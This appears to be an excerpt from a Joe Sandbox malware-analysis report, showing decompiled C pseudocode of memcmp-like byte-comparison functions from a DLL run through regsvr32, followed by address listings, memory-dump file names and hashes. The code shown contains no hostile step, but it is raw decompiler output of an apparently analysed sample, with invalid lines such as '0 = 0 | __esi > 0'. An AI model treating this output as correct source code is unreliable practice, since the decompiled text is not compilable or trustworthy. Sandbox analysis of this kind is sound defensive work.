					if(_t309 != 0) {
						goto L1;
					}
					_t201 =  *(_t191 - 0x1a);
					if(_t201 ==  *(_t195 - 0x1a)) {
						_t309 = 0;
						L26:
						if(_t309 != 0) {
							goto L1;
						}
						_t202 =  *(_t191 - 0x16);
						if(_t202 ==  *(_t195 - 0x16)) {
							_t309 = 0;
							L37:
							if(_t309 != 0) {
								goto L1;
							}
							_t203 =  *(_t191 - 0x12);
							if(_t203 ==  *(_t195 - 0x12)) {
								_t309 = 0;
								L48:
								if(_t309 != 0) {
									goto L1;
								}
								_t204 =  *(_t191 - 0xe);
								if(_t204 ==  *(_t195 - 0xe)) {
									_t309 = 0;
									L59:
									if(_t309 != 0) {
										goto L1;
									}
									if( *(_t191 - 0xa) ==  *(_t195 - 0xa)) {
										_t309 = 0;
										L70:
										if(_t309 != 0) {
											goto L1;
										}
										_t206 =  *(_t191 - 6);
										if(_t206 ==  *(_t195 - 6)) {
											_t309 = 0;
											L81:
											if(_t309 != 0) {
												goto L1;
											}
											if( *(_t191 - 2) ==  *(_t195 - 2)) {
												_t192 = 0;
												L3:
												return _t192;
											}
											_t312 = ( *(_t191 - 2) & 0x000000ff) - ( *(_t195 - 2) & 0x000000ff);
											if(_t312 == 0) {
												L4:
												_t192 = ( *(_t191 - 1) & 0x000000ff) - ( *(_t195 - 1) & 0x000000ff);
												if(_t192 != 0) {
													_t192 = (0 | _t192 > 0x00000000) + (0 | _t192 > 0x00000000) - 1;
												}
												goto L3;
											}
											_t211 = (0 | _t312 > 0x00000000) + (0 | _t312 > 0x00000000) - 1;
											if(_t211 != 0) {
												_t192 = _t211;
												goto L3;
											}
											goto L4;
										}
										_t314 = (_t206 & 0x000000ff) - ( *(_t195 - 6) & 0x000000ff);
										if(_t314 == 0) {
											L74:
											_t316 = ( *(_t191 - 5) & 0x000000ff) - ( *(_t195 - 5) & 0x000000ff);
											if(_t316 == 0) {
												L76:
												_t318 = ( *(_t191 - 4) & 0x000000ff) - ( *(_t195 - 4) & 0x000000ff);
												if(_t318 == 0) {
													L78:
													_t309 = ( *(_t191 - 3) & 0x000000ff) - ( *(_t195 - 3) & 0x000000ff);
													if(_t309 != 0) {
														_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
													}
													goto L81;
												}
												_t309 = (0 | _t318 > 0x00000000) + (0 | _t318 > 0x00000000) - 1;
												if(_t309 != 0) {
													goto L1;
												}
												goto L78;
											}
											_t309 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
											if(_t309 != 0) {
												goto L1;
											}
											goto L76;
										}
										_t309 = (0 | _t314 > 0x00000000) + (0 | _t314 > 0x00000000) - 1;
										if(_t309 != 0) {
											goto L1;
										}
										goto L74;
									}
									_t321 = ( *(_t191 - 0xa) & 0x000000ff) - ( *(_t195 - 0xa) & 0x000000ff);
									if(_t321 == 0) {
										L63:
										_t323 = ( *(_t191 - 9) & 0x000000ff) - ( *(_t195 - 9) & 0x000000ff);
										if(_t323 == 0) {
											L65:
											_t325 = ( *(_t191 - 8) & 0x000000ff) - ( *(_t195 - 8) & 0x000000ff);
											if(_t325 == 0) {
												L67:
												_t309 = ( *(_t191 - 7) & 0x000000ff) - ( *(_t195 - 7) & 0x000000ff);
												if(_t309 != 0) {
													_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
												}
												goto L70;
											}
											_t309 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
											if(_t309 != 0) {
												goto L1;
											}
											goto L67;
										}
										_t309 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
										if(_t309 != 0) {
											goto L1;
										}
										goto L65;
									}
									_t309 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
									if(_t309 != 0) {
										goto L1;
									}
									goto L63;
								}
								_t328 = (_t204 & 0x000000ff) - ( *(_t195 - 0xe) & 0x000000ff);
								if(_t328 == 0) {
									L52:
									_t330 = ( *(_t191 - 0xd) & 0x000000ff) - ( *(_t195 - 0xd) & 0x000000ff);
									if(_t330 == 0) {
										L54:
										_t332 = ( *(_t191 - 0xc) & 0x000000ff) - ( *(_t195 - 0xc) & 0x000000ff);
										if(_t332 == 0) {
											L56:
											_t309 = ( *(_t191 - 0xb) & 0x000000ff) - ( *(_t195 - 0xb) & 0x000000ff);
											if(_t309 != 0) {
												_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
											}
											goto L59;
										}
										_t309 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
										if(_t309 != 0) {
											goto L1;
										}
										goto L56;
									}
									_t309 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
									if(_t309 != 0) {
										goto L1;
									}
									goto L54;
								}
								_t309 = (0 | _t328 > 0x00000000) + (0 | _t328 > 0x00000000) - 1;
								if(_t309 != 0) {
									goto L1;
								}
								goto L52;
							}
							_t335 = (_t203 & 0x000000ff) - ( *(_t195 - 0x12) & 0x000000ff);
							if(_t335 == 0) {
								L41:
								_t337 = ( *(_t191 - 0x11) & 0x000000ff) - ( *(_t195 - 0x11) & 0x000000ff);
								if(_t337 == 0) {
									L43:
									_t339 = ( *(_t191 - 0x10) & 0x000000ff) - ( *(_t195 - 0x10) & 0x000000ff);
									if(_t339 == 0) {
										L45:
										_t309 = ( *(_t191 - 0xf) & 0x000000ff) - ( *(_t195 - 0xf) & 0x000000ff);
										if(_t309 != 0) {
											_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
										}
										goto L48;
									}
									_t309 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
									if(_t309 != 0) {
										goto L1;
									}
									goto L45;
								}
								_t309 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
								if(_t309 != 0) {
									goto L1;
								}
								goto L43;
							}
							_t309 = (0 | _t335 > 0x00000000) + (0 | _t335 > 0x00000000) - 1;
							if(_t309 != 0) {
								goto L1;
							}
							goto L41;
						}
						_t342 = (_t202 & 0x000000ff) - ( *(_t195 - 0x16) & 0x000000ff);
						if(_t342 == 0) {
							L30:
							_t344 = ( *(_t191 - 0x15) & 0x000000ff) - ( *(_t195 - 0x15) & 0x000000ff);
							if(_t344 == 0) {
								L32:
								_t346 = ( *(_t191 - 0x14) & 0x000000ff) - ( *(_t195 - 0x14) & 0x000000ff);
								if(_t346 == 0) {
									L34:
									_t309 = ( *(_t191 - 0x13) & 0x000000ff) - ( *(_t195 - 0x13) & 0x000000ff);
									if(_t309 != 0) {
										_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
									}
									goto L37;
								}
								_t309 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
								if(_t309 != 0) {
									goto L1;
								}
								goto L34;
							}
							_t309 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
							if(_t309 != 0) {
								goto L1;
							}
							goto L32;
						}
						_t309 = (0 | _t342 > 0x00000000) + (0 | _t342 > 0x00000000) - 1;
						if(_t309 != 0) {
							goto L1;
						}
						goto L30;
					}
					_t349 = (_t201 & 0x000000ff) - ( *(_t195 - 0x1a) & 0x000000ff);
					if(_t349 == 0) {
						L19:
						_t351 = ( *(_t191 - 0x19) & 0x000000ff) - ( *(_t195 - 0x19) & 0x000000ff);
						if(_t351 == 0) {
							L21:
							_t353 = ( *(_t191 - 0x18) & 0x000000ff) - ( *(_t195 - 0x18) & 0x000000ff);
							if(_t353 == 0) {
								L23:
								_t309 = ( *(_t191 - 0x17) & 0x000000ff) - ( *(_t195 - 0x17) & 0x000000ff);
								if(_t309 != 0) {
									_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
								}
								goto L26;
							}
							_t309 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
							if(_t309 != 0) {
								goto L1;
							}
							goto L23;
						}
						_t309 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
						if(_t309 != 0) {
							goto L1;
						}
						goto L21;
					}
					_t309 = (0 | _t349 > 0x00000000) + (0 | _t349 > 0x00000000) - 1;
					if(_t309 != 0) {
						goto L1;
					}
					goto L19;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1e) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
					if(__esi == 0) {
						L8:
						__esi =  *(__eax - 0x1d) & 0x000000ff;
						__edx =  *(__ecx - 0x1d) & 0x000000ff;
						__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
						if(__esi == 0) {
							L10:
							__esi =  *(__eax - 0x1c) & 0x000000ff;
							__edx =  *(__ecx - 0x1c) & 0x000000ff;
							__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
							if(__esi == 0) {
								L12:
								__esi =  *(__eax - 0x1b) & 0x000000ff;
								__edx =  *(__ecx - 0x1b) & 0x000000ff;
								__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L15;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L12;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L10;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L8;
				}
				L1:
				_t192 = _t309;
				goto L3;
			}

0x1004b46a
0x1004b46a
0x1004b470
0x1004b4ef
0x1004b4f1
0x1004b4f3
0x00000000
0x00000000
0x1004b4f9
0x1004b4ff
0x1004b57e
0x1004b580
0x1004b582
0x00000000
0x00000000
0x1004b588
0x1004b58e
0x1004b60d
0x1004b60f
0x1004b611
0x00000000
0x00000000
0x1004b617
0x1004b61d
0x1004b69c
0x1004b69e
0x1004b6a0
0x00000000
0x00000000
0x1004b6a6
0x1004b6ac
0x1004b72b
0x1004b72d
0x1004b72f
0x00000000
0x00000000
0x1004b73b
0x1004b7bb
0x1004b7bd
0x1004b7bf
0x00000000
0x00000000
0x1004b7c5
0x1004b7cb
0x1004b84a
0x1004b84c
0x1004b84e
0x00000000
0x00000000
0x1004b85c
0x1004b056
0x1004b058
0x1004bdb4
0x1004bdb4
0x1004b86a
0x1004b86c
0x1004b448
0x1004b450
0x1004b452
0x1004b463
0x1004b463
0x00000000
0x1004b452
0x1004b879
0x1004b87f
0x1004bc98
0x00000000
0x1004bc98
0x00000000
0x1004b885
0x1004b7d4
0x1004b7d6
0x1004b7ed
0x1004b7f5
0x1004b7f7
0x1004b80e
0x1004b816
0x1004b818
0x1004b82f
0x1004b837
0x1004b839
0x1004b846
0x1004b846
0x00000000
0x1004b839
0x1004b825
0x1004b829
0x00000000
0x00000000
0x00000000
0x1004b829
0x1004b804
0x1004b808
0x00000000
0x00000000
0x00000000
0x1004b808
0x1004b7e3
0x1004b7e7
0x00000000
0x00000000
0x00000000
0x1004b7e7
0x1004b745
0x1004b747
0x1004b75e
0x1004b766
0x1004b768
0x1004b77f
0x1004b787
0x1004b789
0x1004b7a0
0x1004b7a8
0x1004b7aa
0x1004b7b7
0x1004b7b7
0x00000000
0x1004b7aa
0x1004b796
0x1004b79a
0x00000000
0x00000000
0x00000000
0x1004b79a
0x1004b775
0x1004b779
0x00000000
0x00000000
0x00000000
0x1004b779
0x1004b754
0x1004b758
0x00000000
0x00000000
0x00000000
0x1004b758
0x1004b6b5
0x1004b6b7
0x1004b6ce
0x1004b6d6
0x1004b6d8
0x1004b6ef
0x1004b6f7
0x1004b6f9
0x1004b710
0x1004b718
0x1004b71a
0x1004b727
0x1004b727
0x00000000
0x1004b71a
0x1004b706
0x1004b70a
0x00000000
0x00000000
0x00000000
0x1004b70a
0x1004b6e5
0x1004b6e9
0x00000000
0x00000000
0x00000000
0x1004b6e9
0x1004b6c4
0x1004b6c8
0x00000000
0x00000000
0x00000000
0x1004b6c8
0x1004b626
0x1004b628
0x1004b63f
0x1004b647
0x1004b649
0x1004b660
0x1004b668
0x1004b66a
0x1004b681
0x1004b689
0x1004b68b
0x1004b698
0x1004b698
0x00000000
0x1004b68b
0x1004b677
0x1004b67b
0x00000000
0x00000000
0x00000000
0x1004b67b
0x1004b656
0x1004b65a
0x00000000
0x00000000
0x00000000
0x1004b65a
0x1004b635
0x1004b639
0x00000000
0x00000000
0x00000000
0x1004b639
0x1004b597
0x1004b599
0x1004b5b0
0x1004b5b8
0x1004b5ba
0x1004b5d1
0x1004b5d9
0x1004b5db
0x1004b5f2
0x1004b5fa
0x1004b5fc
0x1004b609
0x1004b609
0x00000000
0x1004b5fc
0x1004b5e8
0x1004b5ec
0x00000000
0x00000000
0x00000000
0x1004b5ec
0x1004b5c7
0x1004b5cb
0x00000000
0x00000000
0x00000000
0x1004b5cb
0x1004b5a6
0x1004b5aa
0x00000000
0x00000000
0x00000000
0x1004b5aa
0x1004b508
0x1004b50a
0x1004b521
0x1004b529
0x1004b52b
0x1004b542
0x1004b54a
0x1004b54c
0x1004b563
0x1004b56b
0x1004b56d
0x1004b57a
0x1004b57a
0x00000000
0x1004b56d
0x1004b559
0x1004b55d
0x00000000
0x00000000
0x00000000
0x1004b55d
0x1004b538
0x1004b53c
0x00000000
0x00000000
0x00000000
0x1004b53c
0x1004b517
0x1004b51b
0x00000000
0x00000000
0x00000000
0x1004b472
0x1004b472
0x1004b475
0x1004b479
0x1004b47b
0x1004b492
0x1004b492
0x1004b496
0x1004b49a
0x1004b49c
0x1004b4b3
0x1004b4b3
0x1004b4b7
0x1004b4bb
0x1004b4bd
0x1004b4d4
0x1004b4d4
0x1004b4d8
0x1004b4dc
0x1004b4de
0x1004b4e4
0x1004b4e7
0x1004b4eb
0x1004b4eb
0x00000000
0x1004b4de
0x1004b4c3
0x1004b4c6
0x1004b4ca
0x1004b4ce
0x00000000
0x00000000
0x00000000
0x1004b4ce
0x1004b4a2
0x1004b4a5
0x1004b4a9
0x1004b4ad
0x00000000
0x00000000
0x00000000
0x1004b4ad
0x1004b481
0x1004b484
0x1004b488
0x1004b48c
0x00000000
0x00000000
0x00000000
0x1004b48c
0x1004ac83
0x1004ac83
0x00000000

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction ID: 92b78bd843577d70adc6c0f5fbd64983c0a0ea5f252a0995e29b88b46b4a0767
Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction Fuzzy Hash: 5AD17E73C0EDB30A83B5C12D40A822EEAA2AFC169133BC7F5DCD46F389D52A5D5496D4

Uniqueness

Uniqueness Score: -1.00%

Function 1004B05E Relevance: .4, Instructions: 361
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E1004B05E(void* __eax, void* __ecx) {
				void* _t183;
				signed int _t184;
				void* _t187;
				signed char _t193;
				signed char _t194;
				signed char _t195;
				signed char _t196;
				signed char _t198;
				signed int _t296;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t320;
				void* _t322;
				void* _t324;
				void* _t327;
				void* _t329;
				void* _t331;
				void* _t334;
				void* _t336;
				void* _t338;

				_t187 = __ecx;
				_t183 = __eax;
				if( *((intOrPtr*)(__eax - 0x1d)) ==  *((intOrPtr*)(__ecx - 0x1d))) {
					_t296 = 0;
					L12:
					if(_t296 != 0) {
						goto L1;
					}
					_t193 =  *(_t183 - 0x19);
					if(_t193 ==  *(_t187 - 0x19)) {
						_t296 = 0;
						L23:
						if(_t296 != 0) {
							goto L1;
						}
						_t194 =  *(_t183 - 0x15);
						if(_t194 ==  *(_t187 - 0x15)) {
							_t296 = 0;
							L34:
							if(_t296 != 0) {
								goto L1;
							}
							_t195 =  *(_t183 - 0x11);
							if(_t195 ==  *(_t187 - 0x11)) {
								_t296 = 0;
								L45:
								if(_t296 != 0) {
									goto L1;
								}
								_t196 =  *(_t183 - 0xd);
								if(_t196 ==  *(_t187 - 0xd)) {
									_t296 = 0;
									L56:
									if(_t296 != 0) {
										goto L1;
									}
									if( *(_t183 - 9) ==  *(_t187 - 9)) {
										_t296 = 0;
										L67:
										if(_t296 != 0) {
											goto L1;
										}
										_t198 =  *(_t183 - 5);
										if(_t198 ==  *(_t187 - 5)) {
											_t296 = 0;
											L78:
											if(_t296 != 0) {
												goto L1;
											}
											_t184 = ( *(_t183 - 1) & 0x000000ff) - ( *(_t187 - 1) & 0x000000ff);
											if(_t184 != 0) {
												_t184 = (0 | _t184 > 0x00000000) + (0 | _t184 > 0x00000000) - 1;
											}
											L2:
											return _t184;
										}
										_t299 = (_t198 & 0x000000ff) - ( *(_t187 - 5) & 0x000000ff);
										if(_t299 == 0) {
											L71:
											_t301 = ( *(_t183 - 4) & 0x000000ff) - ( *(_t187 - 4) & 0x000000ff);
											if(_t301 == 0) {
												L73:
												_t303 = ( *(_t183 - 3) & 0x000000ff) - ( *(_t187 - 3) & 0x000000ff);
												if(_t303 == 0) {
													L75:
													_t296 = ( *(_t183 - 2) & 0x000000ff) - ( *(_t187 - 2) & 0x000000ff);
													if(_t296 != 0) {
														_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
													}
													goto L78;
												}
												_t296 = (0 | _t303 > 0x00000000) + (0 | _t303 > 0x00000000) - 1;
												if(_t296 != 0) {
													goto L1;
												}
												goto L75;
											}
											_t296 = (0 | _t301 > 0x00000000) + (0 | _t301 > 0x00000000) - 1;
											if(_t296 != 0) {
												goto L1;
											}
											goto L73;
										}
										_t296 = (0 | _t299 > 0x00000000) + (0 | _t299 > 0x00000000) - 1;
										if(_t296 != 0) {
											goto L1;
										}
										goto L71;
									}
									_t306 = ( *(_t183 - 9) & 0x000000ff) - ( *(_t187 - 9) & 0x000000ff);
									if(_t306 == 0) {
										L60:
										_t308 = ( *(_t183 - 8) & 0x000000ff) - ( *(_t187 - 8) & 0x000000ff);
										if(_t308 == 0) {
											L62:
											_t310 = ( *(_t183 - 7) & 0x000000ff) - ( *(_t187 - 7) & 0x000000ff);
											if(_t310 == 0) {
												L64:
												_t296 = ( *(_t183 - 6) & 0x000000ff) - ( *(_t187 - 6) & 0x000000ff);
												if(_t296 != 0) {
													_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
												}
												goto L67;
											}
											_t296 = (0 | _t310 > 0x00000000) + (0 | _t310 > 0x00000000) - 1;
											if(_t296 != 0) {
												goto L1;
											}
											goto L64;
										}
										_t296 = (0 | _t308 > 0x00000000) + (0 | _t308 > 0x00000000) - 1;
										if(_t296 != 0) {
											goto L1;
										}
										goto L62;
									}
									_t296 = (0 | _t306 > 0x00000000) + (0 | _t306 > 0x00000000) - 1;
									if(_t296 != 0) {
										goto L1;
									}
									goto L60;
								}
								_t313 = (_t196 & 0x000000ff) - ( *(_t187 - 0xd) & 0x000000ff);
								if(_t313 == 0) {
									L49:
									_t315 = ( *(_t183 - 0xc) & 0x000000ff) - ( *(_t187 - 0xc) & 0x000000ff);
									if(_t315 == 0) {
										L51:
										_t317 = ( *(_t183 - 0xb) & 0x000000ff) - ( *(_t187 - 0xb) & 0x000000ff);
										if(_t317 == 0) {
											L53:
											_t296 = ( *(_t183 - 0xa) & 0x000000ff) - ( *(_t187 - 0xa) & 0x000000ff);
											if(_t296 != 0) {
												_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
											}
											goto L56;
										}
										_t296 = (0 | _t317 > 0x00000000) + (0 | _t317 > 0x00000000) - 1;
										if(_t296 != 0) {
											goto L1;
										}
										goto L53;
									}
									_t296 = (0 | _t315 > 0x00000000) + (0 | _t315 > 0x00000000) - 1;
									if(_t296 != 0) {
										goto L1;
									}
									goto L51;
								}
								_t296 = (0 | _t313 > 0x00000000) + (0 | _t313 > 0x00000000) - 1;
								if(_t296 != 0) {
									goto L1;
								}
								goto L49;
							}
							_t320 = (_t195 & 0x000000ff) - ( *(_t187 - 0x11) & 0x000000ff);
							if(_t320 == 0) {
								L38:
								_t322 = ( *(_t183 - 0x10) & 0x000000ff) - ( *(_t187 - 0x10) & 0x000000ff);
								if(_t322 == 0) {
									L40:
									_t324 = ( *(_t183 - 0xf) & 0x000000ff) - ( *(_t187 - 0xf) & 0x000000ff);
									if(_t324 == 0) {
										L42:
										_t296 = ( *(_t183 - 0xe) & 0x000000ff) - ( *(_t187 - 0xe) & 0x000000ff);
										if(_t296 != 0) {
											_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
										}
										goto L45;
									}
									_t296 = (0 | _t324 > 0x00000000) + (0 | _t324 > 0x00000000) - 1;
									if(_t296 != 0) {
										goto L1;
									}
									goto L42;
								}
								_t296 = (0 | _t322 > 0x00000000) + (0 | _t322 > 0x00000000) - 1;
								if(_t296 != 0) {
									goto L1;
								}
								goto L40;
							}
							_t296 = (0 | _t320 > 0x00000000) + (0 | _t320 > 0x00000000) - 1;
							if(_t296 != 0) {
								goto L1;
							}
							goto L38;
						}
						_t327 = (_t194 & 0x000000ff) - ( *(_t187 - 0x15) & 0x000000ff);
						if(_t327 == 0) {
							L27:
							_t329 = ( *(_t183 - 0x14) & 0x000000ff) - ( *(_t187 - 0x14) & 0x000000ff);
							if(_t329 == 0) {
								L29:
								_t331 = ( *(_t183 - 0x13) & 0x000000ff) - ( *(_t187 - 0x13) & 0x000000ff);
								if(_t331 == 0) {
									L31:
									_t296 = ( *(_t183 - 0x12) & 0x000000ff) - ( *(_t187 - 0x12) & 0x000000ff);
									if(_t296 != 0) {
										_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
									}
									goto L34;
								}
								_t296 = (0 | _t331 > 0x00000000) + (0 | _t331 > 0x00000000) - 1;
								if(_t296 != 0) {
									goto L1;
								}
								goto L31;
							}
							_t296 = (0 | _t329 > 0x00000000) + (0 | _t329 > 0x00000000) - 1;
							if(_t296 != 0) {
								goto L1;
							}
							goto L29;
						}
						_t296 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
						if(_t296 != 0) {
							goto L1;
						}
						goto L27;
					}
					_t334 = (_t193 & 0x000000ff) - ( *(_t187 - 0x19) & 0x000000ff);
					if(_t334 == 0) {
						L16:
						_t336 = ( *(_t183 - 0x18) & 0x000000ff) - ( *(_t187 - 0x18) & 0x000000ff);
						if(_t336 == 0) {
							L18:
							_t338 = ( *(_t183 - 0x17) & 0x000000ff) - ( *(_t187 - 0x17) & 0x000000ff);
							if(_t338 == 0) {
								L20:
								_t296 = ( *(_t183 - 0x16) & 0x000000ff) - ( *(_t187 - 0x16) & 0x000000ff);
								if(_t296 != 0) {
									_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
								}
								goto L23;
							}
							_t296 = (0 | _t338 > 0x00000000) + (0 | _t338 > 0x00000000) - 1;
							if(_t296 != 0) {
								goto L1;
							}
							goto L20;
						}
						_t296 = (0 | _t336 > 0x00000000) + (0 | _t336 > 0x00000000) - 1;
						if(_t296 != 0) {
							goto L1;
						}
						goto L18;
					}
					_t296 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
					if(_t296 != 0) {
						goto L1;
					}
					goto L16;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1d) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
					if(__esi == 0) {
						L5:
						__esi =  *(__eax - 0x1c) & 0x000000ff;
						__edx =  *(__ecx - 0x1c) & 0x000000ff;
						__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
						if(__esi == 0) {
							L7:
							__esi =  *(__eax - 0x1b) & 0x000000ff;
							__edx =  *(__ecx - 0x1b) & 0x000000ff;
							__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
							if(__esi == 0) {
								L9:
								__esi =  *(__eax - 0x1a) & 0x000000ff;
								__edx =  *(__ecx - 0x1a) & 0x000000ff;
								__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L12;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L9;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L7;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L5;
				}
				L1:
				_t184 = _t296;
				goto L2;
			}

0x1004b05e
0x1004b05e
0x1004b064
0x1004b0e3
0x1004b0e5
0x1004b0e7
0x00000000
0x00000000
0x1004b0ed
0x1004b0f3
0x1004b172
0x1004b174
0x1004b176
0x00000000
0x00000000
0x1004b17c
0x1004b182
0x1004b201
0x1004b203
0x1004b205
0x00000000
0x00000000
0x1004b20b
0x1004b211
0x1004b290
0x1004b292
0x1004b294
0x00000000
0x00000000
0x1004b29a
0x1004b2a0
0x1004b31f
0x1004b321
0x1004b323
0x00000000
0x00000000
0x1004b32f
0x1004b3af
0x1004b3b1
0x1004b3b3
0x00000000
0x00000000
0x1004b3b9
0x1004b3bf
0x1004b43e
0x1004b440
0x1004b442
0x00000000
0x00000000
0x1004b450
0x1004b452
0x1004b463
0x1004b463
0x1004b058
0x1004bdb4
0x1004bdb4
0x1004b3c8
0x1004b3ca
0x1004b3e1
0x1004b3e9
0x1004b3eb
0x1004b402
0x1004b40a
0x1004b40c
0x1004b423
0x1004b42b
0x1004b42d
0x1004b43a
0x1004b43a
0x00000000
0x1004b42d
0x1004b419
0x1004b41d
0x00000000
0x00000000
0x00000000
0x1004b41d
0x1004b3f8
0x1004b3fc
0x00000000
0x00000000
0x00000000
0x1004b3fc
0x1004b3d7
0x1004b3db
0x00000000
0x00000000
0x00000000
0x1004b3db
0x1004b339
0x1004b33b
0x1004b352
0x1004b35a
0x1004b35c
0x1004b373
0x1004b37b
0x1004b37d
0x1004b394
0x1004b39c
0x1004b39e
0x1004b3ab
0x1004b3ab
0x00000000
0x1004b39e
0x1004b38a
0x1004b38e
0x00000000
0x00000000
0x00000000
0x1004b38e
0x1004b369
0x1004b36d
0x00000000
0x00000000
0x00000000
0x1004b36d
0x1004b348
0x1004b34c
0x00000000
0x00000000
0x00000000
0x1004b34c
0x1004b2a9
0x1004b2ab
0x1004b2c2
0x1004b2ca
0x1004b2cc
0x1004b2e3
0x1004b2eb
0x1004b2ed
0x1004b304
0x1004b30c
0x1004b30e
0x1004b31b
0x1004b31b
0x00000000
0x1004b30e
0x1004b2fa
0x1004b2fe
0x00000000
0x00000000
0x00000000
0x1004b2fe
0x1004b2d9
0x1004b2dd
0x00000000
0x00000000
0x00000000
0x1004b2dd
0x1004b2b8
0x1004b2bc
0x00000000
0x00000000
0x00000000
0x1004b2bc
0x1004b21a
0x1004b21c
0x1004b233
0x1004b23b
0x1004b23d
0x1004b254
0x1004b25c
0x1004b25e
0x1004b275
0x1004b27d
0x1004b27f
0x1004b28c
0x1004b28c
0x00000000
0x1004b27f
0x1004b26b
0x1004b26f
0x00000000
0x00000000
0x00000000
0x1004b26f
0x1004b24a
0x1004b24e
0x00000000
0x00000000
0x00000000
0x1004b24e
0x1004b229
0x1004b22d
0x00000000
0x00000000
0x00000000
0x1004b22d
0x1004b18b
0x1004b18d
0x1004b1a4
